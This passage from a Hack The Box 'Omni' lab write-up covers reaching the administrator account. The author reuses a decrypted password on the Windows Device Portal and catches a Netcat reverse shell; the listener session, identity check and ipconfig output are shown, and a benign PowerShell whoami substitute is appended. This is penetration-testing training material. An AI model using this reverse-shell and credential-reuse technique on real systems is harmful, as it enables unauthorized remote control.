Administrator


There isn’t much to privilege escalation to the administrator as I am already the SYSTEM. But here we go.

I can take advantage of the WDP service running over HTTP, just like how I made the lateral movement to the app user. Authenticating as the administrator user with the decrypted password:

Executing a Netcat reverse shell command:

┌──(kali㉿kali)-[~/archive/htb/labs/omni]
└─$ nnc 1234    
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.204] 49707
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
ps c:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\Administrator
ps c:\windows\system32> hostname
omni
ps c:\windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::a8
   ipv6 address. . . . . . . . . . . : dead:beef::f178:17b1:199:4ce4
   temporary ipv6 address. . . . . . : dead:beef::f443:5df:b248:953c
   link-local ipv6 address . . . . . : fe80::f178:17b1:199:4ce4%4
   ipv4 address. . . . . . . . . . . : 10.10.10.204
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%4
                                       10.10.10.2

Privilege Escalation to the administrator user

Now that a valid PowerShell session has been established with the credential of the administrator user, I can continue the last decryption.

I used [System.Security.Principal.WindowsIdentity]::GetCurrent().Name since whoami.exe is not available.
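As an added example that is not part of the original writeup, the PowerShell below reproduces most of what whoami.exe and whoami /groups would report, using only the .NET identity classes that exist on builds where whoami.exe is missing. The $id and $principal variable names are my own.

```powershell
# Added example: a whoami.exe substitute built on the .NET identity classes.
$id        = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object System.Security.Principal.WindowsPrincipal($id)

# Who the token belongs to, how it was authenticated, and whether it carries
# SYSTEM or membership of the built-in Administrators group.
[pscustomobject]@{
    User     = $id.Name
    AuthType = $id.AuthenticationType
    UserSid  = $id.User.Value
    IsSystem = $id.IsSystem
    IsAdmin  = $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
}

# Equivalent of "whoami /groups": every group SID in the token, translated to
# an account name where the SID resolves and left as the raw SID otherwise.
foreach ($sid in $id.Groups) {
    try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $name = '<unresolved>' }
    '{0,-45} {1}' -f $name, $sid.Value
}
```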